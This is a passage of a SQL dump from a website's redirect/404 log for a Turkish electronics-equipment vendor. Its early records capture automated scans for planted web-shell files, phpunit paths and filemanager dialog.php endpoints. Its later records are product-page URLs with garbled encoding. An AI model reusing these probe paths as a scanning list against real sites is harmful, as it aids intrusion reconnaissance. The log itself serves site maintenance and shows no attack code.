00:00:00',301),(40894,'http://3s-technologies.com.tr/tr/wp-admin/includes/media.php.infected.php',NULL,'','',20,0,'2025-06-23 18:43:58','0000-00-00 00:00:00',301),(40895,'http://3s-technologies.com.tr/tr/wp-includes/block-bindings.php',NULL,'','',17,0,'2025-06-23 18:43:59','0000-00-00 00:00:00',301),(40896,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/str_shuffcle.php',NULL,'','',17,0,'2025-06-23 18:43:59','0000-00-00 00:00:00',301),(40897,'http://3s-technologies.com.tr/tr/files/css_compare.php',NULL,'','',24,0,'2025-06-23 18:44:01','0000-00-00 00:00:00',301),(40898,'http://3s-technologies.com.tr/tr/wp-includes/0.php',NULL,'','',33,0,'2025-06-23 18:44:02','0000-00-00 00:00:00',301),(40899,'http://3s-technologies.com.tr/tr/wp-admin/css/acces.php',NULL,'','',16,0,'2025-06-23 18:44:03','0000-00-00 00:00:00',301),(40900,'http://3s-technologies.com.tr/tr/wp-content/uploads/suit5y.php',NULL,'','',17,0,'2025-06-23 18:44:05','0000-00-00 00:00:00',301),(40901,'http://3s-technologies.com.tr/tr/uploads/update_with_pics.php',NULL,'','',16,0,'2025-06-23 18:44:05','0000-00-00 00:00:00',301),(40902,'http://3s-technologies.com.tr/tr/wp-admin/includes/admin-ajax.php',NULL,'','',19,0,'2025-06-23 18:44:06','0000-00-00 00:00:00',301),(40903,'http://3s-technologies.com.tr/tr/wp-admin/includes/go.php',NULL,'','',17,0,'2025-06-23 18:44:07','0000-00-00 00:00:00',301),(40904,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-simplepie-sanitize-kses-stream.php',NULL,'','',16,0,'2025-06-23 18:44:08','0000-00-00 00:00:00',301),(40905,'http://3s-technologies.com.tr/tr/wp-includes/prayer_intentions.php',NULL,'','',16,0,'2025-06-23 18:44:09','0000-00-00 00:00:00',301),(40906,'http://3s-technologies.com.tr/tr/wp-includes/fonts/class-wp-font-collection.php',NULL,'','',19,0,'2025-06-23 18:44:09','0000-00-00 00:00:00',301),(40907,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-pagebuilders-bdsjlk.php',NULL,'','',16,0,'2025-06-23 18:44:10','0000-00-00 00:00:00',301),(40908,'http://3s-technologies.com.tr/tr/wp-admin/css/bgfbmo.php',NULL,'','',16,0,'2025-06-23 18:44:10','0000-00-00 00:00:00',301),(40909,'http://3s-technologies.com.tr/tr/wp-includes/cof.php',NULL,'','',17,0,'2025-06-23 18:44:11','0000-00-00 00:00:00',301),(40910,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-pagebuilders-5tgxav.php',NULL,'','',17,0,'2025-06-23 18:44:12','0000-00-00 00:00:00',301),(40911,'http://3s-technologies.com.tr/tr/wp-admin/maint/doc.php',NULL,'','',16,0,'2025-06-23 18:44:13','0000-00-00 00:00:00',301),(40912,'http://3s-technologies.com.tr/tr/wp-admin/maint/yes.php',NULL,'','',16,0,'2025-06-23 18:44:14','0000-00-00 00:00:00',301),(40913,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-media-list-table-ezd.php',NULL,'','',16,0,'2025-06-23 18:44:15','0000-00-00 00:00:00',301),(40914,'http://3s-technologies.com.tr/tr/images/test.php',NULL,'','',18,0,'2025-06-23 18:44:16','0000-00-00 00:00:00',301),(40915,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/dksuq.php',NULL,'','',16,0,'2025-06-23 18:44:16','0000-00-00 00:00:00',301),(40916,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-ksv1i.php',NULL,'','',25,0,'2025-06-23 18:44:17','0000-00-00 00:00:00',301),(40917,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/hydxrmgtbh.php',NULL,'','',16,0,'2025-06-23 18:44:17','0000-00-00 00:00:00',301),(40918,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/last.php',NULL,'','',15,0,'2025-06-23 18:44:18','0000-00-00 00:00:00',301),(40919,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/strcmp.php',NULL,'','',15,0,'2025-06-23 18:44:20','0000-00-00 00:00:00',301),(40920,'http://3s-technologies.com.tr/tr/wp-content/uploads/emvvuhwx.php',NULL,'','',14,0,'2025-06-23 18:44:21','0000-00-00 00:00:00',301),(40921,'http://3s-technologies.com.tr/tr/wp-includes/css/str_replace.php',NULL,'','',14,0,'2025-06-23 18:44:21','0000-00-00 00:00:00',301),(40922,'http://3s-technologies.com.tr/tr/wp-admin/includes/ace.php',NULL,'','',14,0,'2025-06-23 18:44:21','0000-00-00 00:00:00',301),(40923,'http://3s-technologies.com.tr/tr/wp-includes/wp-admin-css.php',NULL,'','',14,0,'2025-06-23 18:44:22','0000-00-00 00:00:00',301),(40924,'http://3s-technologies.com.tr/tr/wp-content/upgrade/120f9.php',NULL,'','',14,0,'2025-06-23 18:44:23','0000-00-00 00:00:00',301),(40925,'http://3s-technologies.com.tr/tr/wp-includes/text/moon.php',NULL,'','',15,0,'2025-06-23 18:44:23','0000-00-00 00:00:00',301),(40926,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/qwas.php',NULL,'','',15,0,'2025-06-23 18:44:24','0000-00-00 00:00:00',301),(40927,'http://3s-technologies.com.tr/tr/wp-includes/davoeqyv.php',NULL,'','',15,0,'2025-06-23 18:44:24','0000-00-00 00:00:00',301),(40928,'http://3s-technologies.com.tr/tr/wp-includes/js/codemirror/87.php',NULL,'','',14,0,'2025-06-23 18:44:25','0000-00-00 00:00:00',301),(40929,'http://3s-technologies.com.tr/tr/wp-includes/block-template-utils.php',NULL,'','',14,0,'2025-06-23 18:44:25','0000-00-00 00:00:00',301),(40930,'http://3s-technologies.com.tr/tr/wp-includes/fonts/browser.php',NULL,'','',14,0,'2025-06-23 18:44:26','0000-00-00 00:00:00',301),(40931,'http://3s-technologies.com.tr/tr/wp-includes/wp-2019.php',NULL,'','',18,0,'2025-06-23 18:44:27','0000-00-00 00:00:00',301),(40932,'http://3s-technologies.com.tr/tr/images/up.php',NULL,'','',17,0,'2025-06-23 18:44:28','0000-00-00 00:00:00',301),(40933,'http://3s-technologies.com.tr/tr/wp-includes/link-template-git.php',NULL,'','',17,0,'2025-06-23 18:44:29','0000-00-00 00:00:00',301),(40934,'http://3s-technologies.com.tr/tr/wp-admin/images/searchl.php',NULL,'','',18,0,'2025-06-23 18:44:29','0000-00-00 00:00:00',301),(40935,'http://3s-technologies.com.tr/tr/wp-content/uploads/js.php',NULL,'','',17,0,'2025-06-23 18:44:30','0000-00-00 00:00:00',301),(40936,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/brand.php',NULL,'','',18,0,'2025-06-23 18:44:30','0000-00-00 00:00:00',301),(40937,'http://3s-technologies.com.tr/tr/wp-includes/widgets/class-wp-widget-media-audio-module.php',NULL,'','',17,0,'2025-06-23 18:44:31','0000-00-00 00:00:00',301),(40938,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-pagebuilders-3bv4as.php',NULL,'','',18,0,'2025-06-23 18:44:32','0000-00-00 00:00:00',301),(40939,'http://3s-technologies.com.tr/tr/wp-admin/includes/rfzhh.php',NULL,'','',17,0,'2025-06-23 18:44:32','0000-00-00 00:00:00',301),(40940,'http://3s-technologies.com.tr/tr/wp-includes/id3/favicon.php',NULL,'','',17,0,'2025-06-23 18:44:32','0000-00-00 00:00:00',301),(40941,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-damin.php',NULL,'','',17,0,'2025-06-23 18:44:34','0000-00-00 00:00:00',301),(40942,'http://3s-technologies.com.tr/tr/wp-content/up',NULL,'','',16,0,'2025-06-23 18:44:34','0000-00-00 00:00:00',301),(40943,'http://3s-technologies.com.tr/tr/img/wp-login.php',NULL,'','',16,0,'2025-06-23 18:44:42','0000-00-00 00:00:00',301),(40944,'http://3s-technologies.com.tr/tr/images/anjay.php',NULL,'','',16,0,'2025-06-23 18:44:44','0000-00-00 00:00:00',301),(40945,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/small.php',NULL,'','',16,0,'2025-06-23 18:44:45','0000-00-00 00:00:00',301),(40946,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/astab.php',NULL,'','',17,0,'2025-06-23 18:44:47','0000-00-00 00:00:00',301),(40947,'http://3s-technologies.com.tr/tr/astab.php',NULL,'','',24,0,'2025-06-23 18:44:47','0000-00-00 00:00:00',301),(40948,'http://3s-technologies.com.tr/tr/js/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:45','0000-00-00 00:00:00',301),(40949,'http://3s-technologies.com.tr/tr/admin/themes/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:46','0000-00-00 00:00:00',301),(40950,'http://3s-technologies.com.tr/tr/admin/editor/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:47','0000-00-00 00:00:00',301),(40951,'http://3s-technologies.com.tr/tr/asset/tinymce/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:47','0000-00-00 00:00:00',301),(40952,'http://3s-technologies.com.tr/tr/js/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:48','0000-00-00 00:00:00',301),(40953,'http://3s-technologies.com.tr/tr/admin/global/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:50','0000-00-00 00:00:00',301),(40954,'http://3s-technologies.com.tr/tr/admin/ckeditor/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:50','0000-00-00 00:00:00',301),(40955,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:51','0000-00-00 00:00:00',301),(40956,'http://3s-technologies.com.tr/tr/admin/assets/js/ckeditor/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:52','0000-00-00 00:00:00',301),(40957,'http://3s-technologies.com.tr/tr/assets/admin/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:53','0000-00-00 00:00:00',301),(40958,'http://3s-technologies.com.tr/tr/media/js/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:53','0000-00-00 00:00:00',301),(40959,'http://3s-technologies.com.tr/tr/admin/js/filemanager/dialog.php',NULL,'','',1,0,'2025-06-24 02:31:54','0000-00-00 00:00:00',301),(40960,'http://3s-technologies.com.tr/tr/wp-fmfile.php',NULL,'','',41,0,'2025-06-26 09:20:17','0000-00-00 00:00:00',301),(40961,'http://3s-technologies.com.tr/tr/php8.php',NULL,'','',87,0,'2025-06-26 09:20:19','0000-00-00 00:00:00',301),(40962,'http://3s-technologies.com.tr/tr/fix.php',NULL,'','',63,0,'2025-06-26 09:20:20','0000-00-00 00:00:00',301),(40963,'http://3s-technologies.com.tr/tr/headers.php',NULL,'','',43,0,'2025-06-26 09:20:21','0000-00-00 00:00:00',301),(40964,'http://3s-technologies.com.tr/tr/xpw.php',NULL,'','',49,0,'2025-06-26 09:20:34','0000-00-00 00:00:00',301),(40965,'http://3s-technologies.com.tr/tr/array.php',NULL,'','',34,0,'2025-06-26 09:20:34','0000-00-00 00:00:00',301),(40966,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,product_name?language=tr-tr',NULL,'','',1,0,'2025-06-26 11:30:58','0000-00-00 00:00:00',301),(40967,'https://3s-technologies.com.tr/en/ah??leme-wood-processing-120cm',NULL,'','',9,0,'2025-06-26 13:12:58','0000-00-00 00:00:00',301),(40968,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,mf_name',NULL,'','',3,0,'2025-06-26 13:13:05','0000-00-00 00:00:00',301),(40969,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?language=tr-tr',NULL,'','',27,0,'2025-06-26 13:13:09','0000-00-00 00:00:00',301),(40970,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,ordering',NULL,'','',3,0,'2025-06-26 13:13:19','0000-00-00 00:00:00',301),(40971,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,product_name',NULL,'','',3,0,'2025-06-26 13:13:30','0000-00-00 00:00:00',301),(40972,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-h?z/by,product_sku',NULL,'','',3,0,'2025-06-26 13:13:37','0000-00-00 00:00:00',301),(40973,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/by,product_sku?language=tr-tr',NULL,'','',3,0,'2025-06-26 13:13:42','0000-00-00 00:00:00',301),(40974,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/dirdesc',NULL,'','',3,0,'2025-06-26 13:13:49','0000-00-00 00:00:00',301),(40975,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-h??/dirdesc?language=tr-tr',NULL,'','',3,0,'2025-06-26 13:13:54','0000-00-00 00:00:00',301),(40976,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?language=tr-tr',NULL,'','',31,0,'2025-06-26 13:14:00','0000-00-00 00:00:00',301),(40977,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,category_name',NULL,'','',3,0,'2025-06-26 13:14:06','0000-00-00 00:00:00',301),(40978,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-26 13:14:12','0000-00-00 00:00:00',301),(40979,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,mf_name',NULL,'','',3,0,'2025-06-26 13:14:28','0000-00-00 00:00:00',301),(40980,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-26 13:14:34','0000-00-00 00:00:00',301),(40981,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-h?z/by,ordering',NULL,'','',3,0,'2025-06-26 13:14:56','0000-00-00 00:00:00',301),(40982,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/cs40-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-26 16:39:14','0000-00-00 00:00:00',301),(40983,'http://3s-technologies.com.tr/en/products/smd-f?r??n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',4,0,'2025-06-26 16:39:16','0000-00-00 00:00:00',301),(40984,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name',NULL,'','',3,0,'2025-06-26 16:39:19','0000-00-00 00:00:00',301),(40985,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',4,0,'2025-06-26 16:39:21','0000-00-00 00:00:00',301),(40986,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 16:39:23','0000-00-00 00:00:00',301),(40987,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',5,0,'2025-06-26 16:39:27','0000-00-00 00:00:00',301),(40988,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,ordering',NULL,'','',5,0,'2025-06-26 16:39:31','0000-00-00 00:00:00',301),(40989,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',5,0,'2025-06-26 16:39:34','0000-00-00 00:00:00',301),(40990,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 16:39:37','0000-00-00 00:00:00',301),(40991,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2025-06-26 16:39:41','0000-00-00 00:00:00',301),(40992,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name',NULL,'','',5,0,'2025-06-26 16:39:44','0000-00-00 00:00:00',301),(40993,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',5,0,'2025-06-26 16:39:47','0000-00-00 00:00:00',301),(40994,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-26 16:39:50','0000-00-00 00:00:00',301),(40995,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-26 16:39:54','0000-00-00 00:00:00',301),(40996,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_sku',NULL,'','',4,0,'2025-06-26 16:39:58','0000-00-00 00:00:00',301),(40997,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',4,0,'2025-06-26 16:40:03','0000-00-00 00:00:00',301),(40998,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/dirdesc',NULL,'','',4,0,'2025-06-26 16:40:09','0000-00-00 00:00:00',301),(40999,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 16:40:12','0000-00-00 00:00:00',301),(41000,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/mx200lp-detail',NULL,'','',4,0,'2025-06-26 16:40:16','0000-00-00 00:00:00',301),(41001,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/mx200lp-detail/askquestion?tmpl=component',NULL,'','',4,0,'2025-06-26 16:40:20','0000-00-00 00:00:00',301),(41002,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl???language=en-gb',NULL,'','',5,0,'2025-06-26 16:40:23','0000-00-00 00:00:00',301),(41003,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme',NULL,'','',9,0,'2025-06-26 17:21:10','0000-00-00 00:00:00',301),(41004,'http://3s-technologies.com.tr/en/products/smd-d????k-h??zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-26 17:21:14','0000-00-00 00:00:00',301),(41005,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/am100-detail',NULL,'','',5,0,'2025-06-26 17:21:20','0000-00-00 00:00:00',301),(41006,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z',NULL,'','',4,0,'2025-06-26 17:21:24','0000-00-00 00:00:00',301),(41007,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',4,0,'2025-06-26 17:21:28','0000-00-00 00:00:00',301),(41008,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2025-06-26 17:21:32','0000-00-00 00:00:00',301),(41009,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 17:21:35','0000-00-00 00:00:00',301),(41010,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',4,0,'2025-06-26 17:21:37','0000-00-00 00:00:00',301),(41011,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name',NULL,'','',5,0,'2025-06-26 17:21:42','0000-00-00 00:00:00',301),(41012,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',4,0,'2025-06-26 17:21:45','0000-00-00 00:00:00',301),(41013,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name',NULL,'','',4,0,'2025-06-26 17:21:49','0000-00-00 00:00:00',301),(41014,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',5,0,'2025-06-26 17:21:54','0000-00-00 00:00:00',301),(41015,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,ordering',NULL,'','',5,0,'2025-06-26 17:21:57','0000-00-00 00:00:00',301),(41016,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',4,0,'2025-06-26 17:21:59','0000-00-00 00:00:00',301),(41017,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',4,0,'2025-06-26 17:22:05','0000-00-00 00:00:00',301),(41018,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2025-06-26 17:22:08','0000-00-00 00:00:00',301),(41019,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 17:22:11','0000-00-00 00:00:00',301),(41020,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2025-06-26 17:22:15','0000-00-00 00:00:00',301),(41021,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name',NULL,'','',4,0,'2025-06-26 17:22:19','0000-00-00 00:00:00',301),(41022,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',4,0,'2025-06-26 17:22:21','0000-00-00 00:00:00',301),(41023,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 17:22:24','0000-00-00 00:00:00',301),(41024,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-26 17:22:28','0000-00-00 00:00:00',301),(41025,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_sku',NULL,'','',4,0,'2025-06-26 17:22:31','0000-00-00 00:00:00',301),(41026,'http://3s-technologies.com.tr/tr/www/wp-login.php',NULL,'http://3s-technologies.com.tr/www/wp-login.php','',1,0,'2025-06-26 17:47:19','0000-00-00 00:00:00',301),(41027,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?language=en-gb',NULL,'','',2,0,'2025-06-26 18:00:33','0000-00-00 00:00:00',301),(41028,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/mx200lp-3-detail',NULL,'','',4,0,'2025-06-26 18:05:19','0000-00-00 00:00:00',301),(41029,'https://3s-technologies.com.tr/index.php/en/products/b?language=en-gb',NULL,'','',53,0,'2025-06-26 18:05:23','0000-00-00 00:00:00',301),(41030,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,category_name',NULL,'','',5,0,'2025-06-26 18:05:29','0000-00-00 00:00:00',301),(41031,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',5,0,'2025-06-26 18:05:34','0000-00-00 00:00:00',301),(41032,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/??ubuk-lehim',NULL,'','',2,0,'2025-06-26 18:05:58','0000-00-00 00:00:00',301),(41033,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/b?lgesel-lehimleme/by,category_name',NULL,'','',3,0,'2025-06-26 18:43:27','0000-00-00 00:00:00',301),(41034,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/le-40v-detail',NULL,'','',2,0,'2025-06-26 19:12:00','0000-00-00 00:00:00',301),(41035,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-26 19:12:02','0000-00-00 00:00:00',301),(41036,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-26 19:12:04','0000-00-00 00:00:00',301),(41037,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',4,0,'2025-06-26 19:12:06','0000-00-00 00:00:00',301),(41038,'http://3s-technologies.com.tr/en/products/smd-f?r??n/dirdesc',NULL,'','',4,0,'2025-06-26 19:12:08','0000-00-00 00:00:00',301),(41039,'http://3s-technologies.com.tr/en/products/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-26 19:12:10','0000-00-00 00:00:00',301),(41040,'http://3s-technologies.com.tr/en/products/smd-f?r??n/gf-12-hc-ht-detail',NULL,'','',2,0,'2025-06-26 19:12:12','0000-00-00 00:00:00',301),(41041,'http://3s-technologies.com.tr/en/products/smd-f?r??n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-26 19:12:13','0000-00-00 00:00:00',301),(41042,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??',NULL,'','',3,0,'2025-06-26 19:12:15','0000-00-00 00:00:00',301),(41043,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/am100-detail/askquestion?tmpl=component',NULL,'','',4,0,'2025-06-26 19:12:17','0000-00-00 00:00:00',301),(41044,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',4,0,'2025-06-26 19:12:19','0000-00-00 00:00:00',301),(41045,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2025-06-26 19:12:21','0000-00-00 00:00:00',301),(41046,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-26 19:12:23','0000-00-00 00:00:00',301),(41047,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',4,0,'2025-06-26 19:12:25','0000-00-00 00:00:00',301),(41048,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name',NULL,'','',3,0,'2025-06-26 19:12:27','0000-00-00 00:00:00',301),(41049,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-26 19:12:29','0000-00-00 00:00:00',301),(41050,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-26 19:12:31','0000-00-00 00:00:00',301),(41051,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',3,0,'2025-06-26 19:12:33','0000-00-00 00:00:00',301),(41052,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',4,0,'2025-06-26 19:12:35','0000-00-00 00:00:00',301),(41053,'http://3s-technologies.com.tr/en/products/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2025-06-26 19:12:37','0000-00-00 00:00:00',301),(41054,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 19:12:39','0000-00-00 00:00:00',301),(41055,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',4,0,'2025-06-26 19:12:42','0000-00-00 00:00:00',301),(41056,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',3,0,'2025-06-26 19:12:44','0000-00-00 00:00:00',301),(41057,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/cm-602-l-detail',NULL,'','',4,0,'2025-06-26 19:12:46','0000-00-00 00:00:00',301),(41058,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',4,0,'2025-06-26 19:12:48','0000-00-00 00:00:00',301),(41059,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/dirdesc',NULL,'','',4,0,'2025-06-26 19:12:50','0000-00-00 00:00:00',301),(41060,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 19:12:52','0000-00-00 00:00:00',301),(41061,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',3,0,'2025-06-26 19:12:53','0000-00-00 00:00:00',301),(41062,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/npm-detail',NULL,'','',4,0,'2025-06-26 19:12:56','0000-00-00 00:00:00',301),(41063,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z/npm-detail/askquestion?tmpl=component',NULL,'','',4,0,'2025-06-26 19:12:58','0000-00-00 00:00:00',301),(41064,'http://3s-technologies.com.tr/en/products/smd-ultra-h?z?language=en-gb',NULL,'','',4,0,'2025-06-26 19:13:00','0000-00-00 00:00:00',301),(41065,'http://3s-technologies.com.tr/en/wood-processing-ah?ap-i??leme',NULL,'','',4,0,'2025-06-26 19:13:02','0000-00-00 00:00:00',301),(41066,'https://3s-technologies.com.tr/en/wood-processing-ah??leme',NULL,'','',1,0,'2025-06-26 19:13:06','0000-00-00 00:00:00',301),(41067,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme',NULL,'','',5,0,'2025-06-26 19:13:10','0000-00-00 00:00:00',301),(41068,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',5,0,'2025-06-26 19:13:14','0000-00-00 00:00:00',301),(41069,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',6,0,'2025-06-26 19:13:18','0000-00-00 